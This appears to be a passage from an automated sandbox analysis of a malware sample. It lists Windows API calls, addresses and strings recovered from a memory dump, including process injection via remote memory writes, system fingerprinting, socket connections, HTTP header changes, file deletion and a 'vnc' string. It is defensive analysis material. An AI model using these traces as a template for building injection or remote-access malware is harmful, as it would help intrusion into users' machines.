Part of subcall function 00AF69C9: HeapReAlloc.KERNEL32(00000000,?,?,?,00B14E9D,00AE9851,?,?,00B14FB1,?,?,?,?,?,?), ref: 00AF6A06

Part of subcall function 00B13993: memcpy.MSVCRT ref: 00B13AA4

CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 00AEA885
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00AEA8A1

Part of subcall function 00AEE348: CloseHandle.KERNEL32 ref: 00AEE354

Part of subcall function 00AF2FB7: ReleaseMutex.KERNEL32 ref: 00AF2FBB
Part of subcall function 00AF2FB7: CloseHandle.KERNEL32 ref: 00AF2FC2

Part of subcall function 00AF6A69: HeapFree.KERNEL32(00000000,00DB1E90,00AF1877,?,00000000,00B04986,?,?,00000001), ref: 00AF6A76

Part of subcall function 00AEA46D: memset.MSVCRT ref: 00AEA47C
Part of subcall function 00AEA46D: memset.MSVCRT ref: 00AEA4BF
Part of subcall function 00AEA46D: memset.MSVCRT ref: 00AEA4F5

Part of subcall function 00AF1149: VirtualFree.KERNEL32(?,00000000,00008000), ref: 00AF1158

Part of subcall function 00AF0C35: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00AF0C9B
Part of subcall function 00AF0C35: memcpy.MSVCRT ref: 00AF0CB5
Part of subcall function 00AF0C35: VirtualProtect.KERNEL32(?,?,00000002,-00000048), ref: 00AF0CC8
Part of subcall function 00AF0C35: memset.MSVCRT ref: 00AF0D1F
Part of subcall function 00AF0C35: memcpy.MSVCRT ref: 00AF0D33
Part of subcall function 00AF0C35: VirtualProtect.KERNEL32(?,?,?,-00000048), ref: 00AF0E22

Part of subcall function 00B13B9E: memcmp.MSVCRT ref: 00B13C47

Part of subcall function 00AF1BB5: VirtualFree.KERNEL32(?,00000000,00008000), ref: 00AF1BC6
Part of subcall function 00AF1BB5: CloseHandle.KERNEL32 ref: 00AF1BD5

Strings

vnc, xrefs: 00AEA601 00AEA60E

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B15419, Relevance: 10.2, APIs: 3, Strings: 2, Instructions: 46

APIs

LoadLibraryW.KERNEL32(urlmon.dll), ref: 00B15420
GetProcAddress.KERNEL32(?,ObtainUserAgentString), ref: 00B15436
FreeLibrary.KERNEL32 ref: 00B15481

Part of subcall function 00AF69B0: HeapAlloc.KERNEL32(00000008,?,?,00AF519B,?,?,?,?,00B046A1,?,00B049A5,?,?,00000001), ref: 00AF69C1

Part of subcall function 00AF6A69: HeapFree.KERNEL32(00000000,00DB1E90,00AF1877,?,00000000,00B04986,?,?,00000001), ref: 00AF6A76

Strings

urlmon.dll, xrefs: 00B1541B
ObtainUserAgentString, xrefs: 00B1542E

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AFDEFC, Relevance: 10.2, APIs: 3, Strings: 2, Instructions: 40

APIs

EnterCriticalSection.KERNEL32(00B23510,?,00000000,?,00B04659,?,00B049A5,?,?,00000001), ref: 00AFDF10
LeaveCriticalSection.KERNEL32(00B23510,?,00000000,?,00B04659,?,00B049A5,?,?,00000001), ref: 00AFDF38

Part of subcall function 00AFDEBB: GetModuleHandleW.KERNEL32(shell32.dll), ref: 00AFDEC9
Part of subcall function 00AFDEBB: GetProcAddress.KERNEL32(?,SHGetKnownFolderPath), ref: 00AFDED5
Part of subcall function 00AFDEBB: SetLastError.KERNEL32(00000001,00B042C8,00B22954,?,00B22DB4,00000000,00000006,?,00B0BBC2,00B22DB4,?,?,00000000), ref: 00AFDEED

IsWow64Process.KERNEL32(000000FF,?), ref: 00AFDF61

Strings

IsWow64Process, xrefs: 00AFDF44
kernel32.dll, xrefs: 00AFDF49

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AF6997, Relevance: 9.6, APIs: 1, Instructions: 9

APIs

Part of subcall function 00AF692C: EnterCriticalSection.KERNEL32(00B23510,00000024,00AF699F,?,00AF17BF,?,00000000,00B04986,?,?,00000001), ref: 00AF693C
Part of subcall function 00AF692C: LeaveCriticalSection.KERNEL32(00B23510,?,00AF17BF,?,00000000,00B04986,?,?,00000001), ref: 00AF6966

HeapAlloc.KERNEL32(00000000,00000024,?,00AF17BF,?,00000000,00B04986,?,?,00000001), ref: 00AF69A8

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B03C8C, Relevance: 9.6, APIs: 5, Instructions: 138

APIs

Part of subcall function 00B0432D: memcpy.MSVCRT ref: 00B0439E
Part of subcall function 00B0432D: PathRemoveBackslashW.SHLWAPI ref: 00B043A8
Part of subcall function 00B0432D: memcpy.MSVCRT ref: 00B043F1
Part of subcall function 00B0432D: memcpy.MSVCRT ref: 00B0441E
Part of subcall function 00B0432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00B04428

FindFirstFileW.KERNEL32(?,?), ref: 00B03CCB
SetLastError.KERNEL32(?,?,?,?), ref: 00B03DF6

Part of subcall function 00B03E6B: PathMatchSpecW.SHLWAPI(00000010), ref: 00B03E98
Part of subcall function 00B03E6B: PathMatchSpecW.SHLWAPI(00000010), ref: 00B03EB7

FindNextFileW.KERNEL32(?,?), ref: 00B03DC0
GetLastError.KERNEL32(?,?), ref: 00B03DD9
FindClose.KERNEL32 ref: 00B03DEF

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AEDE64, Relevance: 9.5, APIs: 6, Instructions: 88

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,00AEE138,?,?,?,?,?,00000009,00000000), ref: 00AEDE7E
LeaveCriticalSection.KERNEL32 ref: 00AEDF65

Part of subcall function 00AF6997: HeapAlloc.KERNEL32(00000000,00000024,?,00AF17BF,?,00000000,00B04986,?,?,00000001), ref: 00AF69A8

memcpy.MSVCRT ref: 00AEDEEF
memcpy.MSVCRT ref: 00AEDF13
memcpy.MSVCRT ref: 00AEDF2A
memcpy.MSVCRT ref: 00AEDF4A

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B130A2, Relevance: 9.5, APIs: 5, Instructions: 71

APIs

Part of subcall function 00B12755: EnterCriticalSection.KERNEL32(00B23510,?,00B130AF,?,?,00000000), ref: 00B12765
Part of subcall function 00B12755: LeaveCriticalSection.KERNEL32(00B23510,?,00000000), ref: 00B1278F

socket.WS2_32(?,00000002,00000000), ref: 00B130BC
WSAIoctl.WS2_32(?,48000016,00000000,00000000,?,00000000,?,00000000,00000000), ref: 00B130EF
WSAGetLastError.WS2_32(?,48000016,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00000002,00000000,?,?,00000000), ref: 00B130F6

Part of subcall function 00AF69B0: HeapAlloc.KERNEL32(00000008,?,?,00AF519B,?,?,?,?,00B046A1,?,00B049A5,?,?,00000001), ref: 00AF69C1

WSAIoctl.WS2_32(?,48000016,00000000,00000000,?,?,?,00000000,00000000), ref: 00B1312A

Part of subcall function 00AF6A69: HeapFree.KERNEL32(00000000,00DB1E90,00AF1877,?,00000000,00B04986,?,?,00000001), ref: 00AF6A76

closesocket.WS2_32 ref: 00B1313A

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B044FB, Relevance: 9.5, APIs: 5, Instructions: 59

APIs

Part of subcall function 00B0432D: memcpy.MSVCRT ref: 00B0439E
Part of subcall function 00B0432D: PathRemoveBackslashW.SHLWAPI ref: 00B043A8
Part of subcall function 00B0432D: memcpy.MSVCRT ref: 00B043F1
Part of subcall function 00B0432D: memcpy.MSVCRT ref: 00B0441E
Part of subcall function 00B0432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00B04428

FindFirstFileW.KERNEL32(?,?), ref: 00B0452C

Part of subcall function 00AEE826: SetFileAttributesW.KERNEL32(?,00000080), ref: 00AEE82F
Part of subcall function 00AEE826: DeleteFileW.KERNEL32(?), ref: 00AEE836

FindNextFileW.KERNEL32(?,?), ref: 00B0457E
FindClose.KERNEL32 ref: 00B04589
SetFileAttributesW.KERNEL32(?,00000080), ref: 00B04595
RemoveDirectoryW.KERNEL32(?), ref: 00B0459C

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B04A6B, Relevance: 9.4, APIs: 5, Instructions: 109

APIs

DuplicateHandle.KERNEL32(000000FF,?,?,?,00000000,00000000,00000002), ref: 00B04A89

Part of subcall function 00B04159: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040), ref: 00B04188
Part of subcall function 00B04159: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 00B041C7
Part of subcall function 00B04159: VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 00B041EE

DuplicateHandle.KERNEL32(000000FF,?,?,?,00000000,00000000,00000002), ref: 00B04AC4
WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00B04B04
WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00B04B27

Part of subcall function 00B045AE: DuplicateHandle.KERNEL32(000000FF,?,?,?,00000000,00000000,00000002), ref: 00B045D1
Part of subcall function 00B045AE: WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00B045E9
Part of subcall function 00B045AE: DuplicateHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000001), ref: 00B04604

VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 00B04B77

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B0B70A, Relevance: 9.4, APIs: 5, Instructions: 89

APIs

Part of subcall function 00B0432D: memcpy.MSVCRT ref: 00B0439E
Part of subcall function 00B0432D: PathRemoveBackslashW.SHLWAPI ref: 00B043A8
Part of subcall function 00B0432D: memcpy.MSVCRT ref: 00B043F1
Part of subcall function 00B0432D: memcpy.MSVCRT ref: 00B0441E
Part of subcall function 00B0432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00B04428

CreateDirectoryW.KERNEL32(?,00000000), ref: 00B0B783
SetFileAttributesW.KERNEL32(?), ref: 00B0B7A2
CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000001,?,00000000), ref: 00B0B7B9
GetLastError.KERNEL32(?,00000002,?,?), ref: 00B0B7C6
CloseHandle.KERNEL32 ref: 00B0B7FF

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AF5C67, Relevance: 9.1, APIs: 5, Instructions: 49

APIs

EnterCriticalSection.KERNEL32(00DB28B4,?,?,00000001,00B04EA8,?,?,00000001), ref: 00AF5C70
LeaveCriticalSection.KERNEL32(00DB28B4,?,00000001,00B04EA8,?,?,00000001), ref: 00AF5C7A
WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 00AF5CA0
EnterCriticalSection.KERNEL32(00DB28B4,?,00000001,00B04EA8,?,?,00000001), ref: 00AF5CB8
LeaveCriticalSection.KERNEL32(00DB28B4,?,00000001,00B04EA8,?,?,00000001), ref: 00AF5CC2

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AF49D7, Relevance: 9.1, APIs: 6, Instructions: 145

APIs

memset.MSVCRT ref: 00AF4A18

Part of subcall function 00B13D5A: memcpy.MSVCRT ref: 00B13D94

CharLowerW.USER32 ref: 00AF4A5C
CharUpperW.USER32(?,?,00000001), ref: 00AF4A6D
CharLowerW.USER32 ref: 00AF4A81
CharUpperW.USER32(?,00000001), ref: 00AF4A8B
memcmp.MSVCRT ref: 00AF4AA0

Part of subcall function 00AF6A69: HeapFree.KERNEL32(00000000,00DB1E90,00AF1877,?,00000000,00B04986,?,?,00000001), ref: 00AF6A76

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AF7B1D, Relevance: 9.1, APIs: 6, Instructions: 141

APIs

Part of subcall function 00AF568C: TlsSetValue.KERNEL32(00000001,00AFE1BD), ref: 00AF5699

Part of subcall function 00AEF99C: ResetEvent.KERNEL32 ref: 00AEF9B8

WSAGetOverlappedResult.WS2_32(?,?,?,00000000,?), ref: 00AF7B63
WSAGetLastError.WS2_32(?,?,?,00000000,?,00000000), ref: 00AF7B6D
WSAGetLastError.WS2_32(?,?,?,00000000,?,00000000), ref: 00AF7C76
WSAGetLastError.WS2_32(?,?,?,00000000,?,00000000), ref: 00AF7C7F
UnregisterWait.KERNEL32(?), ref: 00AF7CA4
TlsSetValue.KERNEL32(00000000), ref: 00AF7CCF

Part of subcall function 00AEF9C5: memcpy.MSVCRT ref: 00AEF9DA
Part of subcall function 00AEF9C5: SetEvent.KERNEL32 ref: 00AEF9EA

Part of subcall function 00AEF825: InterlockedDecrement.KERNEL32(00000004,00000004,00000000), ref: 00AEF82D

Part of subcall function 00AF6A69: HeapFree.KERNEL32(00000000,00DB1E90,00AF1877,?,00000000,00B04986,?,?,00000001), ref: 00AF6A76

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B0BC3E, Relevance: 9.1, APIs: 5, Instructions: 172

APIs

memset.MSVCRT ref: 00B0BC73
GetComputerNameW.KERNEL32(?,?), ref: 00B0BCA7
GetVersionExW.KERNEL32(?), ref: 00B0BCD0
memset.MSVCRT ref: 00B0BCEF

Part of subcall function 00B00D39: RegOpenKeyExW.ADVAPI32(?,00000000,00000000,?,?), ref: 00B00D60

Part of subcall function 00B00D19: RegFlushKey.ADVAPI32 ref: 00B00D29
Part of subcall function 00B00D19: RegCloseKey.ADVAPI32 ref: 00B00D31

Part of subcall function 00AE9A5B: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000), ref: 00AE9ACA
Part of subcall function 00AE9A5B: CryptHashData.ADVAPI32(?,?,?,00000000), ref: 00AE9AEF

memset.MSVCRT ref: 00B0BDF4

Part of subcall function 00AF6A69: HeapFree.KERNEL32(00000000,00DB1E90,00AF1877,?,00000000,00B04986,?,?,00000001), ref: 00AF6A76

Part of subcall function 00AE9A2A: CryptDestroyHash.ADVAPI32 ref: 00AE9A42
Part of subcall function 00AE9A2A: CryptReleaseContext.ADVAPI32(?,00000000), ref: 00AE9A53

Part of subcall function 00AE9B02: CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000), ref: 00AE9B41

Part of subcall function 00B00FD5: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00B0BD4B,?), ref: 00B00FF2

Part of subcall function 00B00E64: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00B00EBF

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AFD694, Relevance: 9.1, APIs: 6, Instructions: 79

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,00000004,00AFD7B9,00000000,?,?,?,?,?,?,00AFC499,?,00000000), ref: 00AFD69E
HeapCreate.KERNEL32(00040001,00000000,00000000), ref: 00AFD6DB
HeapAlloc.KERNEL32(?,00000000,0000000B,?,?,?,?,00000004,00AFD7B9,00000000), ref: 00AFD6F8
HeapFree.KERNEL32(?,00000000,?,?,00000000,0000000B,?,?,?,?,00000004,00AFD7B9,00000000), ref: 00AFD720
memcpy.MSVCRT ref: 00AFD730

Part of subcall function 00AF599B: EnterCriticalSection.KERNEL32(00B227DC,00000000,00AED9CE,00DB1E90,?,?,?,00AF1992,?,?,?,?,00B048EB,?,?,00000000), ref: 00AF59A7
Part of subcall function 00AF599B: LeaveCriticalSection.KERNEL32(00B227DC,?,?,?,00AF1992,?,?,?,?,00B048EB,?,?,00000000), ref: 00AF59B7

Part of subcall function 00AF09C2: GetCurrentThreadId.KERNEL32 ref: 00AF09D3
Part of subcall function 00AF09C2: memcpy.MSVCRT ref: 00AF0B42
Part of subcall function 00AF09C2: memset.MSVCRT ref: 00AF0BA8
Part of subcall function 00AF09C2: VirtualProtect.KERNEL32(?,?,00000040,?), ref: 00AF0BBD
Part of subcall function 00AF09C2: GetLastError.KERNEL32(?,00000040,?,?,?,00000000), ref: 00AF0BC7

Part of subcall function 00AF59C5: LeaveCriticalSection.KERNEL32(00B227DC,00AF5A45,00000002,?,?,?,00AEDAA2,00000002,00000001,000000FF), ref: 00AF59CF

Part of subcall function 00AF59D6: LeaveCriticalSection.KERNEL32(00B227DC,?,00AED9F7,00000009,00DB1E90,?,?,?,00AF1992,?,?,?,?,00B048EB), ref: 00AF59E3

LeaveCriticalSection.KERNEL32(?,?,00000000,0000000B,?,?,?,?,00000004,00AFD7B9,00000000), ref: 00AFD774

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B15BA7, Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 72

APIs

lstrcmpA.KERNEL32(?,?\C), ref: 00B15BC4
lstrcpyW.KERNEL32(00B1597D), ref: 00B15BD6
lstrcmpA.KERNEL32(?,00AE939C), ref: 00B15BE9
StrCmpNA.SHLWAPI(?,00AE9394,00000002), ref: 00B15BFF
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000104), ref: 00B15C2A

Part of subcall function 00B0432D: memcpy.MSVCRT ref: 00B0439E
Part of subcall function 00B0432D: PathRemoveBackslashW.SHLWAPI ref: 00B043A8
Part of subcall function 00B0432D: memcpy.MSVCRT ref: 00B043F1
Part of subcall function 00B0432D: memcpy.MSVCRT ref: 00B0441E
Part of subcall function 00B0432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00B04428

Strings

?\C, xrefs: 00B15BBC

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AEC41C, Relevance: 9.1, APIs: 5, Instructions: 137

APIs

EnterCriticalSection.KERNEL32(?,77C475F0,?,?,?,00000000,0000EA60,?,?,00000000,0000EA60,00000000), ref: 00AEC44D

Part of subcall function 00B0D0A9: WaitForSingleObject.KERNEL32(?,00000000), ref: 00B0D0B5

WSAGetLastError.WS2_32(?,?,?,?,?,77C475F0,?,?,?,00000000,0000EA60,?,?,00000000,0000EA60,00000000), ref: 00AEC4DF

Part of subcall function 00AEBFFE: getsockopt.WS2_32(?,0000FFFF,00001008,?,?), ref: 00AEC08A
Part of subcall function 00AEBFFE: GetHandleInformation.KERNEL32(?,?), ref: 00AEC09C
Part of subcall function 00AEBFFE: socket.WS2_32(?,00000001,00000006), ref: 00AEC0CF
Part of subcall function 00AEBFFE: socket.WS2_32(?,00000002,00000011), ref: 00AEC0E0
Part of subcall function 00AEBFFE: closesocket.WS2_32(00000002), ref: 00AEC0FF
Part of subcall function 00AEBFFE: closesocket.WS2_32 ref: 00AEC106
Part of subcall function 00AEBFFE: memset.MSVCRT ref: 00AEC1C8
Part of subcall function 00AEBFFE: memcpy.MSVCRT ref: 00AEC3C8

SetEvent.KERNEL32 ref: 00AEC532
SetEvent.KERNEL32 ref: 00AEC56B

Part of subcall function 00B0D090: SetEvent.KERNEL32 ref: 00B0D0A0

Part of subcall function 00AEF825: InterlockedDecrement.KERNEL32(00000004,00000004,00000000), ref: 00AEF82D

LeaveCriticalSection.KERNEL32(?,?,77C475F0,?,?,?,00000000,0000EA60,?,?,00000000,0000EA60,00000000), ref: 00AEC5F0

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B053C3, Relevance: 9.1, APIs: 6, Instructions: 61

APIs

Part of subcall function 00B048F2: GetModuleHandleW.KERNEL32 ref: 00B04932
Part of subcall function 00B048F2: WSAStartup.WS2_32(00000202,?), ref: 00B04998
Part of subcall function 00B048F2: CreateEventW.KERNEL32(00B22974,00000001), ref: 00B049BA
Part of subcall function 00B048F2: GetLengthSid.ADVAPI32(?,?,?,00000001), ref: 00B049EC
Part of subcall function 00B048F2: GetCurrentProcessId.KERNEL32 ref: 00B04A17

SetErrorMode.KERNEL32(00008007), ref: 00B053DC
GetCommandLineW.KERNEL32 ref: 00B053E8
CommandLineToArgvW.SHELL32 ref: 00B053EF
LocalFree.KERNEL32 ref: 00B0542C
ExitProcess.KERNEL32(00000001), ref: 00B0543D

Part of subcall function 00B05087: CreateMutexW.KERNEL32(00B22974,00000001,?), ref: 00B0512D
Part of subcall function 00B05087: GetLastError.KERNEL32(?,?,00000001,?,?,?,00B05452), ref: 00B0513D
Part of subcall function 00B05087: CloseHandle.KERNEL32 ref: 00B0514B
Part of subcall function 00B05087: lstrlenW.KERNEL32(?), ref: 00B051AD
Part of subcall function 00B05087: ExitWindowsEx.USER32(00000014,80000000), ref: 00B051DD
Part of subcall function 00B05087: OpenEventW.KERNEL32(00000002,00000000,?), ref: 00B05203
Part of subcall function 00B05087: SetEvent.KERNEL32 ref: 00B05210
Part of subcall function 00B05087: CloseHandle.KERNEL32 ref: 00B05217
Part of subcall function 00B05087: CloseHandle.KERNEL32 ref: 00B05229
Part of subcall function 00B05087: IsWellKnownSid.ADVAPI32(00DB1EC0,00000016), ref: 00B05279
Part of subcall function 00B05087: CreateEventW.KERNEL32(00B22974,00000001,00000000,?), ref: 00B05348
Part of subcall function 00B05087: WaitForSingleObject.KERNEL32(?,000000FF), ref: 00B05361
Part of subcall function 00B05087: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00B05373
Part of subcall function 00B05087: CloseHandle.KERNEL32(00000000), ref: 00B0538A
Part of subcall function 00B05087: CloseHandle.KERNEL32(?), ref: 00B05390
Part of subcall function 00B05087: CloseHandle.KERNEL32(?), ref: 00B05396

Sleep.KERNEL32(000000FF), ref: 00B05463

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B0027E, Relevance: 9.0, APIs: 5, Instructions: 119

APIs

#8.OLEAUT32(?,?,00AE1618,?,?,00000000,?,00000000,?,00000000,?,00000000), ref: 00B00301

Part of subcall function 00AF1BDD: #6.OLEAUT32 ref: 00AF1BE7
Part of subcall function 00AF1BDD: #2.OLEAUT32(ProhibitDTD), ref: 00AF1BF5

#6.OLEAUT32(00000000,?,00AE1618,?,?,00000000,?,00000000,?,00000000,?,00000000), ref: 00B00350
#8.OLEAUT32(?), ref: 00B0035B
#2.OLEAUT32(?), ref: 00B0036D
#9.OLEAUT32(?), ref: 00B003A4

Part of subcall function 00B107B1: CoCreateInstance.OLE32(00AE17F8,00000000,00004401,00AE1858,?), ref: 00B107C6

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AF9925, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 71

APIs

memcpy.MSVCRT ref: 00AF993C

Part of subcall function 00AE9F72: memcpy.MSVCRT ref: 00AE9F80

memcmp.MSVCRT ref: 00AF995E
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00AF998C

Part of subcall function 00B0432D: memcpy.MSVCRT ref: 00B0439E
Part of subcall function 00B0432D: PathRemoveBackslashW.SHLWAPI ref: 00B043A8
Part of subcall function 00B0432D: memcpy.MSVCRT ref: 00B043F1
Part of subcall function 00B0432D: memcpy.MSVCRT ref: 00B0441E
Part of subcall function 00B0432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00B04428

lstrcmpiW.KERNEL32(?), ref: 00AF99DC

Strings

C:\Documents and Settings\Administrator\Application Data, xrefs: 00AF99AD

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B12B3C, Relevance: 9.0, APIs: 5, Instructions: 69

APIs

Part of subcall function 00B127C1: socket.WS2_32(?,?,00000006), ref: 00B127F5

connect.WS2_32(?,?), ref: 00B12B7A
WSAGetLastError.WS2_32(?,00000000,00000000), ref: 00B12B89
WSASetLastError.WS2_32(?), ref: 00B12BE7

Part of subcall function 00B12968: shutdown.WS2_32(?,00000002), ref: 00B12976
Part of subcall function 00B12968: closesocket.WS2_32(?), ref: 00B1297F
Part of subcall function 00B12968: WSACloseEvent.WS2_32(?), ref: 00B12992

Part of subcall function 00B12917: WSACreateEvent.WS2_32(00000000,?,00B12C15,?,00000000,?,00B12CD1,?,?,?,?,00000000), ref: 00B1292D
Part of subcall function 00B12917: WSAEventSelect.WS2_32(?,?,00B12CD1), ref: 00B12943
Part of subcall function 00B12917: WSACloseEvent.WS2_32(?), ref: 00B12957

WSASetLastError.WS2_32 ref: 00B12BA7
WSAGetLastError.WS2_32 ref: 00B12BA9

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AF1791, Relevance: 9.0, APIs: 5, Instructions: 66

APIs

InitializeCriticalSection.KERNEL32(00B23510), ref: 00AF17B1

Part of subcall function 00AF6997: HeapAlloc.KERNEL32(00000000,00000024,?,00AF17BF,?,00000000,00B04986,?,?,00000001), ref: 00AF69A8

InitializeCriticalSection.KERNEL32 ref: 00AF17C6
memset.MSVCRT ref: 00AF17DB
TlsAlloc.KERNEL32(?,00000000,00B04986,?,?,00000001), ref: 00AF17F2
GetModuleHandleW.KERNEL32(?), ref: 00AF1817

Part of subcall function 00AF8DB0: EnterCriticalSection.KERNEL32(00B23510,00DB1E90,00AF1829,?,00000000,00B04986,?,?,00000001), ref: 00AF8DC0
Part of subcall function 00AF8DB0: LeaveCriticalSection.KERNEL32(00B23510,?,00000000,00B04986,?,?,00000001), ref: 00AF8DE8

Part of subcall function 00AF1857: TlsFree.KERNEL32(?), ref: 00AF1863
Part of subcall function 00AF1857: DeleteCriticalSection.KERNEL32(00DB1E90,00000000,00AF1851,00DB1E90,?,00000000,00B04986,?,?,00000001), ref: 00AF186A

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B00799, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72

APIs

Part of subcall function 00AE9F72: memcpy.MSVCRT ref: 00AE9F80

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00B007CF

Part of subcall function 00B0432D: memcpy.MSVCRT ref: 00B0439E
Part of subcall function 00B0432D: PathRemoveBackslashW.SHLWAPI ref: 00B043A8
Part of subcall function 00B0432D: memcpy.MSVCRT ref: 00B043F1
Part of subcall function 00B0432D: memcpy.MSVCRT ref: 00B0441E
Part of subcall function 00B0432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00B04428

lstrcatW.KERNEL32(?,.dat), ref: 00B0082F
lstrlenW.KERNEL32 ref: 00B00844

Part of subcall function 00AF1AAE: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 00AF1ACA
Part of subcall function 00AF1AAE: WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00AF1AED
Part of subcall function 00AF1AAE: CloseHandle.KERNEL32 ref: 00AF1AFA

Part of subcall function 00AEE826: SetFileAttributesW.KERNEL32(?,00000080), ref: 00AEE82F
Part of subcall function 00AEE826: DeleteFileW.KERNEL32(?), ref: 00AEE836

Strings

C:\Documents and Settings\Administrator\Local Settings\Application Data, xrefs: 00B007F0
.dat, xrefs: 00B00823

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B107DB, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71

APIs

InternetSetOptionA.WININET(?,00000003,00AE6FA4,00000004), ref: 00B10805

Part of subcall function 00B06FD3: EnterCriticalSection.KERNEL32(00B23510,?,00B04693,?,00B049A5,?,?,00000001), ref: 00B06FE3
Part of subcall function 00B06FD3: LeaveCriticalSection.KERNEL32(00B23510,?,00B04693,?,00B049A5,?,?,00000001), ref: 00B07009

GetAcceptLanguagesA.SHLWAPI ref: 00B1084C
memcpy.MSVCRT ref: 00B10886
HttpAddRequestHeadersA.WININET(?,?,?,A0000000), ref: 00B108BF

Strings

Accept-Language: , xrefs: 00B10880

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AEAD53, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49

APIs

Part of subcall function 00B06FD3: EnterCriticalSection.KERNEL32(00B23510,?,00B04693,?,00B049A5,?,?,00000001), ref: 00B06FE3
Part of subcall function 00B06FD3: LeaveCriticalSection.KERNEL32(00B23510,?,00B04693,?,00B049A5,?,?,00000001), ref: 00B07009

GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00AEADA3
GetProcAddress.KERNEL32(?,GetProductInfo), ref: 00AEADB3
GetSystemDefaultUILanguage.KERNEL32(?,00AEAA9B), ref: 00AEADEE

Strings

kernel32.dll, xrefs: 00AEAD9E
GetProductInfo, xrefs: 00AEADAD

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B15D27, Relevance: 8.3, APIs: 3, Strings: 1, Instructions: 81

APIs

GetTempPathW.KERNEL32(00000104), ref: 00B15D3A
lstrcpyA.KERNEL32(?,00AE939A,00000000,00B15FC9,?,?,?,00B15FC9,?,?,?,?,?,?,?,00AFBD61), ref: 00B15DD1
